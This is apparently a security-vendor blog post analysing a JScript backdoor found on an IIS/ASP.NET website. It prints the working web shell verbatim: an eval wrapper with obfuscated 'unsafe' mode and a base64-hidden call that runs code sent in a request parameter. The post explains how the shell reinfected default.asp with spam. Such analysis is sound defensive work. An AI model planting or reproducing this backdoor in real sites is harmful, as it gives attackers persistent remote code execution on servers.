JScript ASP.NET Backdoor

Backdoors can be simple and powerful at the same time. They’re also very common to be seen along with any kind of infection so that an attacker can get unauthorized access to the server and, although you try to clean the whole malicious content from your website, they can be used to reinfect it again and again.

Here is a small example of an ASP.NET backdoor in a website running on IIS:

<script runat="server" language="JScript">function popup(str) {var q = "u";var w = "afe";var a = q + "ns" + w;var b= eval(str,a);return(b);}</script>

The code above executes whatever command you pass as argument through the str parameter. Note that the eval function is using a second parameter, which is “unsafe”, so the eval method can be executed in the same security context as the calling code.

The code above doesn’t do much alone. The declared popup function must be used somewhere. Indeed, if you scroll down the file you will see a small piece of code trying to hide itself

popup(popup(System.Text.Encoding.Default.GetString(System.Convert.FromBase64String(&quoteUmVxdWVzdC5JdGVtWyJzeW15aGsiXQ=="))));

You can see that the popup function is being called twice. The inner call retrieves the value of the symyhk request parameter ( Request.Item[“symyhk”] is the base64 encoded part). The outer call executes the code passed in the symyhk parameter.

This technique is used to reinfect ASP websites and, in the case where we got this code from, the main default.asp was being overwritten with spam. No matter how many times the default.asp was restored, the malicious code would reappear in the file until the backdoor was removed. If you need help cleaning it up and protecting your website, let us know.